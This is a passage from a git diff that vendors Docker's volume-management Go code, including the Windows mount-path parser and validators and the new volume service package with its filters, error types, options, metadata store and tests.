Name: + // - Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx) + // - And then followed by a colon which is not in the capture group + // - And can be optional + + // rxDestination is the regex expression for the mount destination + rxDestination = `(?P((?:\\\\\?\\)?([a-z]):((?:[\\/][^\\/:*?"<>\r\n]+)*[\\/]?))|(` + rxPipe + `))` + + rxLCOWDestination = `(?P/(?:[^\\/:*?"<>\r\n]+[/]?)*)` + // Destination (aka container path): + // - Variation on hostdir but can be a drive followed by colon as well + // - If a path, must be absolute. Can include spaces + // - Drive cannot be c: (explicitly checked in code, not RegEx) + + // rxMode is the regex expression for the mode of the mount + // Mode (optional): + // - Hopefully self explanatory in comparison to above regex's. + // - Colon is not in the capture group + rxMode = `(:(?P(?i)ro|rw))?` +) + +type mountValidator func(mnt *mount.Mount) error + +func windowsSplitRawSpec(raw, destRegex string) ([]string, error) { + specExp := regexp.MustCompile(`^` + rxSource + destRegex + rxMode + `$`) + match := specExp.FindStringSubmatch(strings.ToLower(raw)) + + // Must have something back + if len(match) == 0 { + return nil, errInvalidSpec(raw) + } + + var split []string + matchgroups := make(map[string]string) + // Pull out the sub expressions from the named capture groups + for i, name := range specExp.SubexpNames() { + matchgroups[name] = strings.ToLower(match[i]) + } + if source, exists := matchgroups["source"]; exists { + if source != "" { + split = append(split, source) + } + } + if destination, exists := matchgroups["destination"]; exists { + if destination != "" { + split = append(split, destination) + } + } + if mode, exists := matchgroups["mode"]; exists { + if mode != "" { + split = append(split, mode) + } + } + // Fix #26329. If the destination appears to be a file, and the source is null, + // it may be because we've fallen through the possible naming regex and hit a + // situation where the user intention was to map a file into a container through + // a local volume, but this is not supported by the platform. + if matchgroups["source"] == "" && matchgroups["destination"] != "" { + volExp := regexp.MustCompile(`^` + rxName + `$`) + reservedNameExp := regexp.MustCompile(`^` + rxReservedNames + `$`) + + if volExp.MatchString(matchgroups["destination"]) { + if reservedNameExp.MatchString(matchgroups["destination"]) { + return nil, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", matchgroups["destination"]) + } + } else { + + exists, isDir, _ := currentFileInfoProvider.fileInfo(matchgroups["destination"]) + if exists && !isDir { + return nil, fmt.Errorf("file '%s' cannot be mapped. Only directories can be mapped on this platform", matchgroups["destination"]) + + } + } + } + return split, nil +} + +func windowsValidMountMode(mode string) bool { + if mode == "" { + return true + } + return rwModes[strings.ToLower(mode)] +} +func windowsValidateNotRoot(p string) error { + p = strings.ToLower(strings.Replace(p, `/`, `\`, -1)) + if p == "c:" || p == `c:\` { + return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p) + } + return nil +} + +var windowsSpecificValidators mountValidator = func(mnt *mount.Mount) error { + return windowsValidateNotRoot(mnt.Target) +} + +func windowsValidateRegex(p, r string) error { + if regexp.MustCompile(`^` + r + `$`).MatchString(strings.ToLower(p)) { + return nil + } + return fmt.Errorf("invalid mount path: '%s'", p) +} +func windowsValidateAbsolute(p string) error { + if err := windowsValidateRegex(p, rxDestination); err != nil { + return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p) + } + return nil +} + +func windowsDetectMountType(p string) mount.Type { + if strings.HasPrefix(p, `\\.\pipe\`) { + return mount.TypeNamedPipe + } else if regexp.MustCompile(`^` + rxHostDir + `$`).MatchString(p) { + return mount.TypeBind + } else { + return mount.TypeVolume + } +} + +func (p *windowsParser) ReadWrite(mode string) bool { + return strings.ToLower(mode) != "ro" +} + +// IsVolumeNameValid checks a volume name in a platform specific manner. +func (p *windowsParser) ValidateVolumeName(name string) error { + nameExp := regexp.MustCompile(`^` + rxName + `$`) + if !nameExp.MatchString(name) { + return errors.New("invalid volume name") + } + nameExp = regexp.MustCompile(`^` + rxReservedNames + `$`) + if nameExp.MatchString(name) { + return fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name) + } + return nil +} +func (p *windowsParser) ValidateMountConfig(mnt *mount.Mount) error { + return p.validateMountConfigReg(mnt, rxDestination, windowsSpecificValidators) +} + +type fileInfoProvider interface { + fileInfo(path string) (exist, isDir bool, err error) +} + +type defaultFileInfoProvider struct { +} + +func (defaultFileInfoProvider) fileInfo(path string) (exist, isDir bool, err error) { + fi, err := os.Stat(path) + if err != nil { + if !os.IsNotExist(err) { + return false, false, err + } + return false, false, nil + } + return true, fi.IsDir(), nil +} + +var currentFileInfoProvider fileInfoProvider = defaultFileInfoProvider{} + +func (p *windowsParser) validateMountConfigReg(mnt *mount.Mount, destRegex string, additionalValidators ...mountValidator) error { + + for _, v := range additionalValidators { + if err := v(mnt); err != nil { + return &errMountConfig{mnt, err} + } + } + if len(mnt.Target) == 0 { + return &errMountConfig{mnt, errMissingField("Target")} + } + + if err := windowsValidateRegex(mnt.Target, destRegex); err != nil { + return &errMountConfig{mnt, err} + } + + switch mnt.Type { + case mount.TypeBind: + if len(mnt.Source) == 0 { + return &errMountConfig{mnt, errMissingField("Source")} + } + // Don't error out just because the propagation mode is not supported on the platform + if opts := mnt.BindOptions; opts != nil { + if len(opts.Propagation) > 0 { + return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)} + } + } + if mnt.VolumeOptions != nil { + return &errMountConfig{mnt, errExtraField("VolumeOptions")} + } + + if err := windowsValidateAbsolute(mnt.Source); err != nil { + return &errMountConfig{mnt, err} + } + + exists, isdir, err := currentFileInfoProvider.fileInfo(mnt.Source) + if err != nil { + return &errMountConfig{mnt, err} + } + if !exists { + return &errMountConfig{mnt, errBindSourceDoesNotExist(mnt.Source)} + } + if !isdir { + return &errMountConfig{mnt, fmt.Errorf("source path must be a directory")} + } + + case mount.TypeVolume: + if mnt.BindOptions != nil { + return &errMountConfig{mnt, errExtraField("BindOptions")} + } + + if len(mnt.Source) == 0 && mnt.ReadOnly { + return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")} + } + + if len(mnt.Source) != 0 { + if err := p.ValidateVolumeName(mnt.Source); err != nil { + return &errMountConfig{mnt, err} + } + } + case mount.TypeNamedPipe: + if len(mnt.Source) == 0 { + return &errMountConfig{mnt, errMissingField("Source")} + } + + if mnt.BindOptions != nil { + return &errMountConfig{mnt, errExtraField("BindOptions")} + } + + if mnt.ReadOnly { + return &errMountConfig{mnt, errExtraField("ReadOnly")} + } + + if windowsDetectMountType(mnt.Source) != mount.TypeNamedPipe { + return &errMountConfig{mnt, fmt.Errorf("'%s' is not a valid pipe path", mnt.Source)} + } + + if windowsDetectMountType(mnt.Target) != mount.TypeNamedPipe { + return &errMountConfig{mnt, fmt.Errorf("'%s' is not a valid pipe path", mnt.Target)} + } + default: + return &errMountConfig{mnt, errors.New("mount type unknown")} + } + return nil +} +func (p *windowsParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { + return p.parseMountRaw(raw, volumeDriver, rxDestination, true, windowsSpecificValidators) +} + +func (p *windowsParser) parseMountRaw(raw, volumeDriver, destRegex string, convertTargetToBackslash bool, additionalValidators ...mountValidator) (*MountPoint, error) { + arr, err := windowsSplitRawSpec(raw, destRegex) + if err != nil { + return nil, err + } + + var spec mount.Mount + var mode string + switch len(arr) { + case 1: + // Just a destination path in the container + spec.Target = arr[0] + case 2: + if windowsValidMountMode(arr[1]) { + // Destination + Mode is not a valid volume - volumes + // cannot include a mode. e.g. /foo:rw + return nil, errInvalidSpec(raw) + } + // Host Source Path or Name + Destination + spec.Source = strings.Replace(arr[0], `/`, `\`, -1) + spec.Target = arr[1] + case 3: + // HostSourcePath+DestinationPath+Mode + spec.Source = strings.Replace(arr[0], `/`, `\`, -1) + spec.Target = arr[1] + mode = arr[2] + default: + return nil, errInvalidSpec(raw) + } + if convertTargetToBackslash { + spec.Target = strings.Replace(spec.Target, `/`, `\`, -1) + } + + if !windowsValidMountMode(mode) { + return nil, errInvalidMode(mode) + } + + spec.Type = windowsDetectMountType(spec.Source) + spec.ReadOnly = !p.ReadWrite(mode) + + // cannot assume that if a volume driver is passed in that we should set it + if volumeDriver != "" && spec.Type == mount.TypeVolume { + spec.VolumeOptions = &mount.VolumeOptions{ + DriverConfig: &mount.Driver{Name: volumeDriver}, + } + } + + if copyData, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet { + if spec.VolumeOptions == nil { + spec.VolumeOptions = &mount.VolumeOptions{} + } + spec.VolumeOptions.NoCopy = !copyData + } + + mp, err := p.parseMountSpec(spec, destRegex, convertTargetToBackslash, additionalValidators...) + if mp != nil { + mp.Mode = mode + } + if err != nil { + err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err) + } + return mp, err +} + +func (p *windowsParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) { + return p.parseMountSpec(cfg, rxDestination, true, windowsSpecificValidators) +} +func (p *windowsParser) parseMountSpec(cfg mount.Mount, destRegex string, convertTargetToBackslash bool, additionalValidators ...mountValidator) (*MountPoint, error) { + if err := p.validateMountConfigReg(&cfg, destRegex, additionalValidators...); err != nil { + return nil, err + } + mp := &MountPoint{ + RW: !cfg.ReadOnly, + Destination: cfg.Target, + Type: cfg.Type, + Spec: cfg, + } + if convertTargetToBackslash { + mp.Destination = strings.Replace(cfg.Target, `/`, `\`, -1) + } + + switch cfg.Type { + case mount.TypeVolume: + if cfg.Source == "" { + mp.Name = stringid.GenerateNonCryptoID() + } else { + mp.Name = cfg.Source + } + mp.CopyData = p.DefaultCopyMode() + + if cfg.VolumeOptions != nil { + if cfg.VolumeOptions.DriverConfig != nil { + mp.Driver = cfg.VolumeOptions.DriverConfig.Name + } + if cfg.VolumeOptions.NoCopy { + mp.CopyData = false + } + } + case mount.TypeBind: + mp.Source = strings.Replace(cfg.Source, `/`, `\`, -1) + case mount.TypeNamedPipe: + mp.Source = strings.Replace(cfg.Source, `/`, `\`, -1) + } + // cleanup trailing `\` except for paths like `c:\` + if len(mp.Source) > 3 && mp.Source[len(mp.Source)-1] == '\\' { + mp.Source = mp.Source[:len(mp.Source)-1] + } + if len(mp.Destination) > 3 && mp.Destination[len(mp.Destination)-1] == '\\' { + mp.Destination = mp.Destination[:len(mp.Destination)-1] + } + return mp, nil +} + +func (p *windowsParser) ParseVolumesFrom(spec string) (string, string, error) { + if len(spec) == 0 { + return "", "", fmt.Errorf("volumes-from specification cannot be an empty string") + } + + specParts := strings.SplitN(spec, ":", 2) + id := specParts[0] + mode := "rw" + + if len(specParts) == 2 { + mode = specParts[1] + if !windowsValidMountMode(mode) { + return "", "", errInvalidMode(mode) + } + + // Do not allow copy modes on volumes-from + if _, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet { + return "", "", errInvalidMode(mode) + } + } + return id, mode, nil +} + +func (p *windowsParser) DefaultPropagationMode() mount.Propagation { + return mount.Propagation("") +} + +func (p *windowsParser) ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error) { + return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS) +} +func (p *windowsParser) DefaultCopyMode() bool { + return false +} +func (p *windowsParser) IsBackwardCompatible(m *MountPoint) bool { + return false +} + +func (p *windowsParser) ValidateTmpfsMountDestination(dest string) error { + return errors.New("Platform does not support tmpfs") +} diff --git a/vendor/github.com/docker/docker/volume/service/by.go b/vendor/github.com/docker/docker/volume/service/by.go new file mode 100644 index 0000000000..c5a4638d2a --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/by.go @@ -0,0 +1,89 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/volume" +) + +// By is an interface which is used to implement filtering on volumes. +type By interface { + isBy() +} + +// ByDriver is `By` that filters based on the driver names that are passed in +func ByDriver(drivers ...string) By { + return byDriver(drivers) +} + +type byDriver []string + +func (byDriver) isBy() {} + +// ByReferenced is a `By` that filters based on if the volume has references +type ByReferenced bool + +func (ByReferenced) isBy() {} + +// And creates a `By` combining all the passed in bys using AND logic. +func And(bys ...By) By { + and := make(andCombinator, 0, len(bys)) + for _, by := range bys { + and = append(and, by) + } + return and +} + +type andCombinator []By + +func (andCombinator) isBy() {} + +// Or creates a `By` combining all the passed in bys using OR logic. +func Or(bys ...By) By { + or := make(orCombinator, 0, len(bys)) + for _, by := range bys { + or = append(or, by) + } + return or +} + +type orCombinator []By + +func (orCombinator) isBy() {} + +// CustomFilter is a `By` that is used by callers to provide custom filtering +// logic. +type CustomFilter filterFunc + +func (CustomFilter) isBy() {} + +// FromList returns a By which sets the initial list of volumes to use +func FromList(ls *[]volume.Volume, by By) By { + return &fromList{by: by, ls: ls} +} + +type fromList struct { + by By + ls *[]volume.Volume +} + +func (fromList) isBy() {} + +func byLabelFilter(filter filters.Args) By { + return CustomFilter(func(v volume.Volume) bool { + dv, ok := v.(volume.DetailedVolume) + if !ok { + return false + } + + labels := dv.Labels() + if !filter.MatchKVList("label", labels) { + return false + } + if filter.Contains("label!") { + if filter.MatchKVList("label!", labels) { + return false + } + } + return true + }) +} diff --git a/vendor/github.com/docker/docker/volume/service/convert.go b/vendor/github.com/docker/docker/volume/service/convert.go new file mode 100644 index 0000000000..2967dc6722 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/convert.go @@ -0,0 +1,132 @@ +package service + +import ( + "context" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/volume" + "github.com/sirupsen/logrus" +) + +// convertOpts are used to pass options to `volumeToAPI` +type convertOpt interface { + isConvertOpt() +} + +type useCachedPath bool + +func (useCachedPath) isConvertOpt() {} + +type calcSize bool + +func (calcSize) isConvertOpt() {} + +type pathCacher interface { + CachedPath() string +} + +func (s *VolumesService) volumesToAPI(ctx context.Context, volumes []volume.Volume, opts ...convertOpt) []*types.Volume { + var ( + out = make([]*types.Volume, 0, len(volumes)) + getSize bool + cachedPath bool + ) + + for _, o := range opts { + switch t := o.(type) { + case calcSize: + getSize = bool(t) + case useCachedPath: + cachedPath = bool(t) + } + } + for _, v := range volumes { + select { + case <-ctx.Done(): + return nil + default: + } + apiV := volumeToAPIType(v) + + if cachedPath { + if vv, ok := v.(pathCacher); ok { + apiV.Mountpoint = vv.CachedPath() + } + } else { + apiV.Mountpoint = v.Path() + } + + if getSize { + p := v.Path() + if apiV.Mountpoint == "" { + apiV.Mountpoint = p + } + sz, err := directory.Size(ctx, p) + if err != nil { + logrus.WithError(err).WithField("volume", v.Name()).Warnf("Failed to determine size of volume") + sz = -1 + } + apiV.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(s.vs.CountReferences(v))} + } + + out = append(out, &apiV) + } + return out +} + +func volumeToAPIType(v volume.Volume) types.Volume { + createdAt, _ := v.CreatedAt() + tv := types.Volume{ + Name: v.Name(), + Driver: v.DriverName(), + CreatedAt: createdAt.Format(time.RFC3339), + } + if v, ok := v.(volume.DetailedVolume); ok { + tv.Labels = v.Labels() + tv.Options = v.Options() + tv.Scope = v.Scope() + } + if cp, ok := v.(pathCacher); ok { + tv.Mountpoint = cp.CachedPath() + } + return tv +} + +func filtersToBy(filter filters.Args, acceptedFilters map[string]bool) (By, error) { + if err := filter.Validate(acceptedFilters); err != nil { + return nil, err + } + var bys []By + if drivers := filter.Get("driver"); len(drivers) > 0 { + bys = append(bys, ByDriver(drivers...)) + } + if filter.Contains("name") { + bys = append(bys, CustomFilter(func(v volume.Volume) bool { + return filter.Match("name", v.Name()) + })) + } + bys = append(bys, byLabelFilter(filter)) + + if filter.Contains("dangling") { + var dangling bool + if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") { + dangling = true + } else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") { + return nil, invalidFilter{"dangling", filter.Get("dangling")} + } + bys = append(bys, ByReferenced(!dangling)) + } + + var by By + switch len(bys) { + case 0: + case 1: + by = bys[0] + default: + by = And(bys...) + } + return by, nil +} diff --git a/vendor/github.com/docker/docker/volume/store/db.go b/vendor/github.com/docker/docker/volume/service/db.go similarity index 84% rename from vendor/github.com/docker/docker/volume/store/db.go rename to vendor/github.com/docker/docker/volume/service/db.go index c5fd1643f5..3b31f7bf14 100644 --- a/vendor/github.com/docker/docker/volume/store/db.go +++ b/vendor/github.com/docker/docker/volume/service/db.go @@ -1,11 +1,12 @@ -package store +package service // import "github.com/docker/docker/volume/service" import ( "encoding/json" - "github.com/Sirupsen/logrus" "github.com/boltdb/bolt" + "github.com/docker/docker/errdefs" "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var volumeBucketName = []byte("volumes") @@ -28,7 +29,10 @@ func setMeta(tx *bolt.Tx, name string, meta volumeMetadata) error { if err != nil { return err } - b := tx.Bucket(volumeBucketName) + b, err := tx.CreateBucketIfNotExists(volumeBucketName) + if err != nil { + return errors.Wrap(err, "error creating volume bucket") + } return errors.Wrap(b.Put([]byte(name), metaJSON), "error setting volume metadata") } @@ -42,8 +46,11 @@ func (s *VolumeStore) getMeta(name string) (volumeMetadata, error) { func getMeta(tx *bolt.Tx, name string, meta *volumeMetadata) error { b := tx.Bucket(volumeBucketName) + if b == nil { + return errdefs.NotFound(errors.New("volume bucket does not exist")) + } val := b.Get([]byte(name)) - if string(val) == "" { + if len(val) == 0 { return nil } if err := json.Unmarshal(val, meta); err != nil { diff --git a/vendor/github.com/docker/docker/volume/service/db_test.go b/vendor/github.com/docker/docker/volume/service/db_test.go new file mode 100644 index 0000000000..4cac9176b7 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/db_test.go @@ -0,0 +1,52 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + "time" + + "github.com/boltdb/bolt" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestSetGetMeta(t *testing.T) { + t.Parallel() + + dir, err := ioutil.TempDir("", "test-set-get") + assert.NilError(t, err) + defer os.RemoveAll(dir) + + db, err := bolt.Open(filepath.Join(dir, "db"), 0600, &bolt.Options{Timeout: 1 * time.Second}) + assert.NilError(t, err) + + store := &VolumeStore{db: db} + + _, err = store.getMeta("test") + assert.Assert(t, is.ErrorContains(err, "")) + + err = db.Update(func(tx *bolt.Tx) error { + _, err := tx.CreateBucket(volumeBucketName) + return err + }) + assert.NilError(t, err) + + meta, err := store.getMeta("test") + assert.NilError(t, err) + assert.DeepEqual(t, volumeMetadata{}, meta) + + testMeta := volumeMetadata{ + Name: "test", + Driver: "fake", + Labels: map[string]string{"a": "1", "b": "2"}, + Options: map[string]string{"foo": "bar"}, + } + err = store.setMeta("test", testMeta) + assert.NilError(t, err) + + meta, err = store.getMeta("test") + assert.NilError(t, err) + assert.DeepEqual(t, testMeta, meta) +} diff --git a/vendor/github.com/docker/docker/volume/service/default_driver.go b/vendor/github.com/docker/docker/volume/service/default_driver.go new file mode 100644 index 0000000000..1c1d5c54bc --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/default_driver.go @@ -0,0 +1,21 @@ +// +build linux windows + +package service // import "github.com/docker/docker/volume/service" +import ( + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/pkg/errors" +) + +func setupDefaultDriver(store *drivers.Store, root string, rootIDs idtools.IDPair) error { + d, err := local.New(root, rootIDs) + if err != nil { + return errors.Wrap(err, "error setting up default driver") + } + if !store.Register(d, volume.DefaultDriverName) { + return errors.New("local volume driver could not be registered") + } + return nil +} diff --git a/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go b/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go new file mode 100644 index 0000000000..fdb275eb9d --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go @@ -0,0 +1,10 @@ +// +build !linux,!windows + +package service // import "github.com/docker/docker/volume/service" + +import ( + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/volume/drivers" +) + +func setupDefaultDriver(_ *drivers.Store, _ string, _ idtools.IDPair) error { return nil } diff --git a/vendor/github.com/docker/docker/volume/store/errors.go b/vendor/github.com/docker/docker/volume/service/errors.go similarity index 65% rename from vendor/github.com/docker/docker/volume/store/errors.go rename to vendor/github.com/docker/docker/volume/service/errors.go index 980175f29c..ce2d678dab 100644 --- a/vendor/github.com/docker/docker/volume/store/errors.go +++ b/vendor/github.com/docker/docker/volume/service/errors.go @@ -1,22 +1,34 @@ -package store +package service // import "github.com/docker/docker/volume/service" import ( + "fmt" "strings" - - "github.com/pkg/errors" ) -var ( +const ( // errVolumeInUse is a typed error returned when trying to remove a volume that is currently in use by a container - errVolumeInUse = errors.New("volume is in use") + errVolumeInUse conflictError = "volume is in use" // errNoSuchVolume is a typed error returned if the requested volume doesn't exist in the volume store - errNoSuchVolume = errors.New("no such volume") - // errInvalidName is a typed error returned when creating a volume with a name that is not valid on the platform - errInvalidName = errors.New("volume name is not valid on this platform") + errNoSuchVolume notFoundError = "no such volume" // errNameConflict is a typed error returned on create when a volume exists with the given name, but for a different driver - errNameConflict = errors.New("volume name must be unique") + errNameConflict conflictError = "volume name must be unique" ) +type conflictError string + +func (e conflictError) Error() string { + return string(e) +} +func (conflictError) Conflict() {} + +type notFoundError string + +func (e notFoundError) Error() string { + return string(e) +} + +func (notFoundError) NotFound() {} + // OpErr is the error type returned by functions in the store package. It describes // the operation, volume name, and error. type OpErr struct { @@ -47,6 +59,11 @@ func (e *OpErr) Error() string { return s } +// Cause returns the error the caused this error +func (e *OpErr) Cause() error { + return e.Err +} + // IsInUse returns a boolean indicating whether the error indicates that a // volume is in use func IsInUse(err error) bool { @@ -64,13 +81,31 @@ func IsNameConflict(err error) bool { return isErr(err, errNameConflict) } +type causal interface { + Cause() error +} + func isErr(err error, expected error) bool { - err = errors.Cause(err) switch pe := err.(type) { case nil: return false - case *OpErr: - err = errors.Cause(pe.Err) + case causal: + return isErr(pe.Cause(), expected) } return err == expected } + +type invalidFilter struct { + filter string + value interface{} +} + +func (e invalidFilter) Error() string { + msg := "Invalid filter '" + e.filter + if e.value != nil { + msg += fmt.Sprintf("=%s", e.value) + } + return msg + "'" +} + +func (e invalidFilter) InvalidParameter() {} diff --git a/vendor/github.com/docker/docker/volume/service/opts/opts.go b/vendor/github.com/docker/docker/volume/service/opts/opts.go new file mode 100644 index 0000000000..6c7e5f4ea6 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/opts/opts.go @@ -0,0 +1,89 @@ +package opts + +// CreateOption is used to pass options in when creating a volume +type CreateOption func(*CreateConfig) + +// CreateConfig is the set of config options that can be set when creating +// a volume +type CreateConfig struct { + Options map[string]string + Labels map[string]string + Reference string +} + +// WithCreateLabels creates a CreateOption which sets the labels to the +// passed in value +func WithCreateLabels(labels map[string]string) CreateOption { + return func(cfg *CreateConfig) { + cfg.Labels = labels + } +} + +// WithCreateOptions creates a CreateOption which sets the options passed +// to the volume driver when creating a volume to the options passed in. +func WithCreateOptions(opts map[string]string) CreateOption { + return func(cfg *CreateConfig) { + cfg.Options = opts + } +} + +// WithCreateReference creats a CreateOption which sets a reference to use +// when creating a volume. This ensures that the volume is created with a reference +// already attached to it to prevent race conditions with Create and volume cleanup. +func WithCreateReference(ref string) CreateOption { + return func(cfg *CreateConfig) { + cfg.Reference = ref + } +} + +// GetConfig is used with `GetOption` to set options for the volumes service's +// `Get` implementation. +type GetConfig struct { + Driver string + Reference string + ResolveStatus bool +} + +// GetOption is passed to the service `Get` add extra details on the get request +type GetOption func(*GetConfig) + +// WithGetDriver provides the driver to get the volume from +// If no driver is provided to `Get`, first the available metadata is checked +// to see which driver it belongs to, if that is not available all drivers are +// probed to find the volume. +func WithGetDriver(name string) GetOption { + return func(o *GetConfig) { + o.Driver = name + } +} + +// WithGetReference indicates to `Get` to increment the reference count for the +// retreived volume with the provided reference ID. +func WithGetReference(ref string) GetOption { + return func(o *GetConfig) { + o.Reference = ref + } +} + +// WithGetResolveStatus indicates to `Get` to also fetch the volume status. +// This can cause significant overhead in the volume lookup. +func WithGetResolveStatus(cfg *GetConfig) { + cfg.ResolveStatus = true +} + +// RemoveConfig is used by `RemoveOption` to store config options for remove +type RemoveConfig struct { + PurgeOnError bool +} + +// RemoveOption is used to pass options to the volumes service `Remove` implementation +type RemoveOption func(*RemoveConfig) + +// WithPurgeOnError is an option passed to `Remove` which will purge all cached +// data about a volume even if there was an error while attempting to remove the +// volume. +func WithPurgeOnError(b bool) RemoveOption { + return func(o *RemoveConfig) { + o.PurgeOnError = b + } +} diff --git a/vendor/github.com/docker/docker/volume/store/restore.go b/vendor/github.com/docker/docker/volume/service/restore.go similarity index 85% rename from vendor/github.com/docker/docker/volume/store/restore.go rename to vendor/github.com/docker/docker/volume/service/restore.go index c0c5b519bc..55c66c4f42 100644 --- a/vendor/github.com/docker/docker/volume/store/restore.go +++ b/vendor/github.com/docker/docker/volume/service/restore.go @@ -1,12 +1,12 @@ -package store +package service // import "github.com/docker/docker/volume/service" import ( + "context" "sync" - "github.com/Sirupsen/logrus" "github.com/boltdb/bolt" "github.com/docker/docker/volume" - "github.com/docker/docker/volume/drivers" + "github.com/sirupsen/logrus" ) // restore is called when a new volume store is created. @@ -21,6 +21,7 @@ func (s *VolumeStore) restore() { ls = listMeta(tx) return nil }) + ctx := context.Background() chRemove := make(chan *volumeMetadata, len(ls)) var wg sync.WaitGroup @@ -33,7 +34,7 @@ func (s *VolumeStore) restore() { var v volume.Volume var err error if meta.Driver != "" { - v, err = lookupVolume(meta.Driver, meta.Name) + v, err = lookupVolume(ctx, s.drivers, meta.Driver, meta.Name) if err != nil && err != errNoSuchVolume { logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", meta.Name).Warn("Error restoring volume") return @@ -44,7 +45,7 @@ func (s *VolumeStore) restore() { return } } else { - v, err = s.getVolume(meta.Name) + v, err = s.getVolume(ctx, meta.Name, meta.Driver) if err != nil { if err == errNoSuchVolume { chRemove <- &meta @@ -59,13 +60,14 @@ func (s *VolumeStore) restore() { } // increment driver refcount - volumedrivers.CreateDriver(meta.Driver) + s.drivers.CreateDriver(meta.Driver) // cache the volume s.globalLock.Lock() s.options[v.Name()] = meta.Options s.labels[v.Name()] = meta.Labels s.names[v.Name()] = v + s.refs[v.Name()] = make(map[string]struct{}) s.globalLock.Unlock() }(meta) } diff --git a/vendor/github.com/docker/docker/volume/service/restore_test.go b/vendor/github.com/docker/docker/volume/service/restore_test.go new file mode 100644 index 0000000000..95420d9586 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/restore_test.go @@ -0,0 +1,58 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "context" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/service/opts" + volumetestutils "github.com/docker/docker/volume/testutils" + "gotest.tools/assert" +) + +func TestRestore(t *testing.T) { + t.Parallel() + + dir, err := ioutil.TempDir("", "test-restore") + assert.NilError(t, err) + defer os.RemoveAll(dir) + + drivers := volumedrivers.NewStore(nil) + driverName := "test-restore" + drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName) + + s, err := NewStore(dir, drivers) + assert.NilError(t, err) + defer s.Shutdown() + + ctx := context.Background() + _, err = s.Create(ctx, "test1", driverName) + assert.NilError(t, err) + + testLabels := map[string]string{"a": "1"} + testOpts := map[string]string{"foo": "bar"} + _, err = s.Create(ctx, "test2", driverName, opts.WithCreateOptions(testOpts), opts.WithCreateLabels(testLabels)) + assert.NilError(t, err) + + s.Shutdown() + + s, err = NewStore(dir, drivers) + assert.NilError(t, err) + + v, err := s.Get(ctx, "test1") + assert.NilError(t, err) + + dv := v.(volume.DetailedVolume) + var nilMap map[string]string + assert.DeepEqual(t, nilMap, dv.Options()) + assert.DeepEqual(t, nilMap, dv.Labels()) + + v, err = s.Get(ctx, "test2") + assert.NilError(t, err) + dv = v.(volume.DetailedVolume) + assert.DeepEqual(t, testOpts, dv.Options()) + assert.DeepEqual(t, testLabels, dv.Labels()) +} diff --git a/vendor/github.com/docker/docker/volume/service/service.go b/vendor/github.com/docker/docker/volume/service/service.go new file mode 100644 index 0000000000..a62a32de50 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/service.go @@ -0,0 +1,243 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "context" + "sync/atomic" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/service/opts" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +type ds interface { + GetDriverList() []string +} + +type volumeEventLogger interface { + LogVolumeEvent(volumeID, action string, attributes map[string]string) +} + +// VolumesService manages access to volumes +type VolumesService struct { + vs *VolumeStore + ds ds + pruneRunning int32 + eventLogger volumeEventLogger +} + +// NewVolumeService creates a new volume service +func NewVolumeService(root string, pg plugingetter.PluginGetter, rootIDs idtools.IDPair, logger volumeEventLogger) (*VolumesService, error) { + ds := drivers.NewStore(pg) + if err := setupDefaultDriver(ds, root, rootIDs); err != nil { + return nil, err + } + + vs, err := NewStore(root, ds) + if err != nil { + return nil, err + } + return &VolumesService{vs: vs, ds: ds, eventLogger: logger}, nil +} + +// GetDriverList gets the list of registered volume drivers +func (s *VolumesService) GetDriverList() []string { + return s.ds.GetDriverList() +} + +// Create creates a volume +func (s *VolumesService) Create(ctx context.Context, name, driverName string, opts ...opts.CreateOption) (*types.Volume, error) { + if name == "" { + name = stringid.GenerateNonCryptoID() + } + v, err := 